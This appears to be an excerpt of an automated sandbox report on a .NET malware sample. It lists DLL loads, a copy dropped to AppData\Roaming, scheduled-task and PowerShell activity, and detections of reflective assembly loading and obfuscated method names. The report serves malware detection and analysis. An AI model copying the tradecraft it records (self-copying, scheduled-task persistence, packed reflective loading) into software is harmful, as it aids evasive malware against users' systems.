                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: dwrite.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: windowscodecs.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: amsi.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: textshaping.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: iconcodecservice.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: propsys.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: edputil.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: urlmon.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: iertutil.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: srvcli.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: netutils.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: windows.staterepositoryps.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: appresolver.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: bcp47langs.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: slc.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: sppc.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: onecorecommonproxystub.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: onecoreuapcommonproxystub.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: rasapi32.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: rasman.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: rtutils.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: dnsapi.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: rasadhlp.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: fwpuclnt.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: secur32.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: schannel.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: mskeyprotect.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: ncryptsslp.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: ntmarta.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: wbemcomn.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: amsi.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: windowscodecs.dll
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: I5pvP0CU6M.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: I5pvP0CU6M.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                    Data Obfuscation

                    barindex
                    .NET source code contains potential unpacker
                    Source: 0.2.I5pvP0CU6M.exe.3d25ad0.1.raw.unpack, XlF5VlCIHRSQX8M5eh.cs.Net Code: _200C_200C_202D_206C_200B_206A_206D_200B_200D_200C_202D_206A_206D_202A_206A_206B_202B_206C_202D_200B_202E_202B_202A_206C_206A_206D_202D_206B_206D_206B_200D_202B_202D_206C_206F_206C_200B_202B_206A_206D_202E System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.I5pvP0CU6M.exe.46b1cd0.4.raw.unpack, xJpQPIrqp0EqOJe24h.cs.Net Code: klkHZpY7O7 System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.I5pvP0CU6M.exe.73d0000.5.raw.unpack, XlF5VlCIHRSQX8M5eh.cs.Net Code: _200C_200C_202D_206C_200B_206A_206D_200B_200D_200C_202D_206A_206D_202A_206A_206B_202B_206C_202D_200B_202E_202B_202A_206C_206A_206D_202D_206B_206D_206B_200D_202B_202D_206C_206F_206C_200B_202B_206A_206D_202E System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.I5pvP0CU6M.exe.7880000.6.raw.unpack, xJpQPIrqp0EqOJe24h.cs.Net Code: klkHZpY7O7 System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.I5pvP0CU6M.exe.470b2f0.3.raw.unpack, xJpQPIrqp0EqOJe24h.cs.Net Code: klkHZpY7O7 System.Reflection.Assembly.Load(byte[])
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeCode function: 0_2_058D92DF push B00531A5h; iretd 0_2_058D92ED
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeCode function: 17_2_06BCE5CF push es; ret 17_2_06BCE5E0
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeCode function: 17_2_06BC1810 push es; ret 17_2_06BC1820
                    Source: I5pvP0CU6M.exeStatic PE information: section name: .text entropy: 7.711719915976035
                    Source: VcihjWRO.exe.0.drStatic PE information: section name: .text entropy: 7.711719915976035
                    Source: 0.2.I5pvP0CU6M.exe.46b1cd0.4.raw.unpack, VwQhcbvgaBqPqLYxwV.csHigh entropy of concatenated method names: 'p1eka595e5', 'FYckc1tBRR', 'Rokk6ZBYAd', 'YVo6KhCr1e', 'tXs6zPFhUy', 'eR9kPxrbmH', 'BC8kXl5nrX', 'bwOkDrTPfe', 'Dvbk70XZQx', 'pNgkH5nkF2'
                    Source: 0.2.I5pvP0CU6M.exe.46b1cd0.4.raw.unpack, CZu7K8Dkcj1USqkK9x.csHigh entropy of concatenated method names: 'isiZpkcuL', 'iLpjhHKFF', 'MPinlaT63', 'TwK04TMt2', 'SAKAqsNDS', 'nmF4dpGnI', 'kLhiIFJRn4kKcc2xUY', 'Jp1MWLxOvFk6HYaUuq', 'BJyqrNInG', 'mBT94KvFK'
                    Source: 0.2.I5pvP0CU6M.exe.46b1cd0.4.raw.unpack, w9m7i9uGNFMZ1XfNtL.csHigh entropy of concatenated method names: 'NKAhQUG6FH', 'QcthAMELp0', 'QjFh24Dvi0', 'lnlhfcyknX', 'A3BhlMdLiZ', 'EiQhFcUCJo', 'XUGhvVdBxM', 'oAMhWMoKty', 'jgfhRmTltr', 'ybghGFjmJe'
                    Source: 0.2.I5pvP0CU6M.exe.46b1cd0.4.raw.unpack, xJpQPIrqp0EqOJe24h.csHigh entropy of concatenated method names: 'j2E7tDgvY1', 'mJ77aL46yD', 'u7j7S7CbD2', 'mHQ7cbompf', 'PtP7YckZQI', 'ubH76r2Ped', 'NoY7kgcL2Y', 'Ny77rMNpOr', 'aG371lXYus', 'FRr7JMKyMv'
                    Source: 0.2.I5pvP0CU6M.exe.46b1cd0.4.raw.unpack, kKxwEIStxq1vPp0mrw.csHigh entropy of concatenated method names: 'Dispose', 'tn9XyElHc0', 'RkkDf5GE1i', 'UwnFF1hWV5', 'f76XKb9lgN', 'n6yXzZHsc4', 'ProcessDialogKey', 'iI8DPuKFvc', 'elNDXej6Xm', 'ClmDD0FgIn'
                    Source: 0.2.I5pvP0CU6M.exe.46b1cd0.4.raw.unpack, muDhSpXPkaWtGtdX5MC.csHigh entropy of concatenated method names: 'NdULMPeH0Y', 'Er1LiV6pgl', 'akbLZWTdAf', 'scyLjbWQ9F', 'AdFL8Rhtye', 'SMSLn1ucys', 'FOZL0kqmFG', 'btoLQLoQs6', 'ik3LACLGXp', 'uMRL46MA7Z'
                    Source: 0.2.I5pvP0CU6M.exe.46b1cd0.4.raw.unpack, lVrsRvAAKIBmDAjCj7.csHigh entropy of concatenated method names: 'jBvcjYO8VR', 'rEAcnScBhA', 'eACcQcGfkR', 'HlacAvRRnl', 'h9EcBcac7m', 'O0mcU1akTa', 'FZmcdUuVY7', 'vDIcqHMkEn', 'Oj8cLvmamR', 'W1Nc9rSx5R'
                    Source: 0.2.I5pvP0CU6M.exe.46b1cd0.4.raw.unpack, pf0sQA4KGX4Cb5UbBX.csHigh entropy of concatenated method names: 'tWhY8fQrv6', 'zFqY0AwLyE', 'Pg9cgQlmID', 'AsNclCvabg', 'hQ4cFjGJxv', 'PxacTvlCc0', 'wGmcvEIe0r', 'nmwcW21pCl', 'v3scbTi1FJ', 'Qj4cRGPf9G'
                    Source: 0.2.I5pvP0CU6M.exe.46b1cd0.4.raw.unpack, x9bdvNQOCuV2nB7v8T.csHigh entropy of concatenated method names: 'c1QSseQU40', 'qQtSmOmatD', 'pCTSO0Fni1', 'AgTSofdFm4', 'IeZSeDEBlE', 'IVOSpDvdE7', 'TU0SwpI3oe', 'GdnSI9xrJh', 'FV9SyoQoNg', 'N2ISKoCkqs'
                    Source: 0.2.I5pvP0CU6M.exe.46b1cd0.4.raw.unpack, y6mgajH58xCCMCJyEw.csHigh entropy of concatenated method names: 'KhMXk9bdvN', 'SCuXrV2nB7', 'LAKXJIBmDA', 'ACjXC7Uf0s', 'PUbXBBX5BZ', 'R39XUMPlhw', 'eSjB116h68PxKOrSA4', 'ycX1OSCpph8rKawuMx', 'Q9gXXKKQHC', 'bRmX7rC12p'
                    Source: 0.2.I5pvP0CU6M.exe.46b1cd0.4.raw.unpack, uTPyuxOpGucxINp0Hi.csHigh entropy of concatenated method names: 'ToString', 'ADjUGc8EuV', 'IWqUfYP5Af', 'LfRUgujaiq', 'Tb8UlPSCml', 'oHLUFVrjTe', 'FTCUTcPn7S', 'DJwUvnK0Vu', 'Pe9UWAwdoe', 'yLHUb5fg4T'
                    Source: 0.2.I5pvP0CU6M.exe.46b1cd0.4.raw.unpack, CFgInTKNUgQwY9apQO.csHigh entropy of concatenated method names: 'u44LXmX69v', 'S0ML7xOTOo', 'gWxLHRW8AL', 'UXkLa84mZi', 'E4XLSInem5', 'wyoLYGcotA', 'rpJL6qIXD1', 'cGrqwKGImr', 'zkcqIHScvA', 'LZ9qy6HPZo'
                    Source: 0.2.I5pvP0CU6M.exe.46b1cd0.4.raw.unpack, nhs725X77qqlp1KEoKf.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'IZc9sQ60VR', 'ECM9mG9MCi', 'nsA9ONNXEY', 'Xf69oYLlIE', 'gIn9eEOXDb', 'FOD9pXDAB2', 'yYr9w0tDKy'
                    Source: 0.2.I5pvP0CU6M.exe.46b1cd0.4.raw.unpack, c6b9lgINh6yZHsc46I.csHigh entropy of concatenated method names: 'T9oqaJ6PHo', 'SSKqSXXnh9', 'u0gqcArwvd', 'CgKqYJXWl7', 'iDMq6kZ6E5', 'B5LqkOIueJ', 'cJpqrJLnmk', 'l6pq16hSJW', 'uBRqJgEtFS', 'ciaqCmUqQp'
                    Source: 0.2.I5pvP0CU6M.exe.46b1cd0.4.raw.unpack, XgebogbwOsR0gfglTQ.csHigh entropy of concatenated method names: 'nXckMHmDJ1', 'yq6ki3Z6Px', 'kNEkZwdf9j', 'l8mkjCSxmW', 'MxOk83Vo6h', 'XOsknQlf96', 'iD7k0urPU0', 'W4ckQULa0o', 'nCbkAM3Qew', 'nrkk4rcXV8'
                    Source: 0.2.I5pvP0CU6M.exe.46b1cd0.4.raw.unpack, e76RDfs2gMTWkMESU9.csHigh entropy of concatenated method names: 'cYvBRe4ITx', 'WyDB5XwVY2', 'oe5BsOmxPH', 'BWiBmOPU69', 'HuiBfHi5jM', 'ukZBgRkE4k', 'DyUBli1OxA', 'bo8BFdaH6K', 'qt8BT7oNHM', 'jA0BvRRd00'
                    Source: 0.2.I5pvP0CU6M.exe.46b1cd0.4.raw.unpack, BuKFvcytlNej6Xmnlm.csHigh entropy of concatenated method names: 'M1jq2uwCFU', 'Tn5qfYjhZj', 'Xn1qghuX1p', 'ymCqlLwbJU', 'y5LqsNy8sn', 'aj5qFtliUi', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.I5pvP0CU6M.exe.46b1cd0.4.raw.unpack, PBZm392MPlhwZB1smS.csHigh entropy of concatenated method names: 'ERb6tC2RPO', 'kQa6S3jlpu', 'CAx6Y5Rqt5', 'FL46kMHMM2', 'Ewq6rYIClm', 'NJbYeQhPIb', 'rL0YpqvCZh', 'tUhYwJT6Mg', 'RvJYIbuxdV', 'G3NYy3NiIo'
                    Source: 0.2.I5pvP0CU6M.exe.46b1cd0.4.raw.unpack, KMEUyHpk0r1NX0mCU0.csHigh entropy of concatenated method names: 'QBfdIGkJum', 'Is5dKjXoRh', 'lLjqPwkq3k', 'S1gqXhnKoa', 'MjAdGJYt0G', 'HI9d5bCQ3Z', 'OHMduo6TD3', 'BOBdsiYdBw', 'asvdm8bkBo', 'ItYdO0O1sq'
                    Source: 0.2.I5pvP0CU6M.exe.46b1cd0.4.raw.unpack, YLZhRozVOXHF08W4EV.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'B3WLhl1Nqk', 'A7gLBDYqvp', 'w3aLUmAfcP', 'PSULdqE2Zl', 'bDrLqNfXur', 'zV6LLjSiBe', 'yaUL91hUno'
                    Source: 0.2.I5pvP0CU6M.exe.7880000.6.raw.unpack, VwQhcbvgaBqPqLYxwV.csHigh entropy of concatenated method names: 'p1eka595e5', 'FYckc1tBRR', 'Rokk6ZBYAd', 'YVo6KhCr1e', 'tXs6zPFhUy', 'eR9kPxrbmH', 'BC8kXl5nrX', 'bwOkDrTPfe', 'Dvbk70XZQx', 'pNgkH5nkF2'
                    Source: 0.2.I5pvP0CU6M.exe.7880000.6.raw.unpack, CZu7K8Dkcj1USqkK9x.csHigh entropy of concatenated method names: 'isiZpkcuL', 'iLpjhHKFF', 'MPinlaT63', 'TwK04TMt2', 'SAKAqsNDS', 'nmF4dpGnI', 'kLhiIFJRn4kKcc2xUY', 'Jp1MWLxOvFk6HYaUuq', 'BJyqrNInG', 'mBT94KvFK'
                    Source: 0.2.I5pvP0CU6M.exe.7880000.6.raw.unpack, w9m7i9uGNFMZ1XfNtL.csHigh entropy of concatenated method names: 'NKAhQUG6FH', 'QcthAMELp0', 'QjFh24Dvi0', 'lnlhfcyknX', 'A3BhlMdLiZ', 'EiQhFcUCJo', 'XUGhvVdBxM', 'oAMhWMoKty', 'jgfhRmTltr', 'ybghGFjmJe'
                    Source: 0.2.I5pvP0CU6M.exe.7880000.6.raw.unpack, xJpQPIrqp0EqOJe24h.csHigh entropy of concatenated method names: 'j2E7tDgvY1', 'mJ77aL46yD', 'u7j7S7CbD2', 'mHQ7cbompf', 'PtP7YckZQI', 'ubH76r2Ped', 'NoY7kgcL2Y', 'Ny77rMNpOr', 'aG371lXYus', 'FRr7JMKyMv'
                    Source: 0.2.I5pvP0CU6M.exe.7880000.6.raw.unpack, kKxwEIStxq1vPp0mrw.csHigh entropy of concatenated method names: 'Dispose', 'tn9XyElHc0', 'RkkDf5GE1i', 'UwnFF1hWV5', 'f76XKb9lgN', 'n6yXzZHsc4', 'ProcessDialogKey', 'iI8DPuKFvc', 'elNDXej6Xm', 'ClmDD0FgIn'
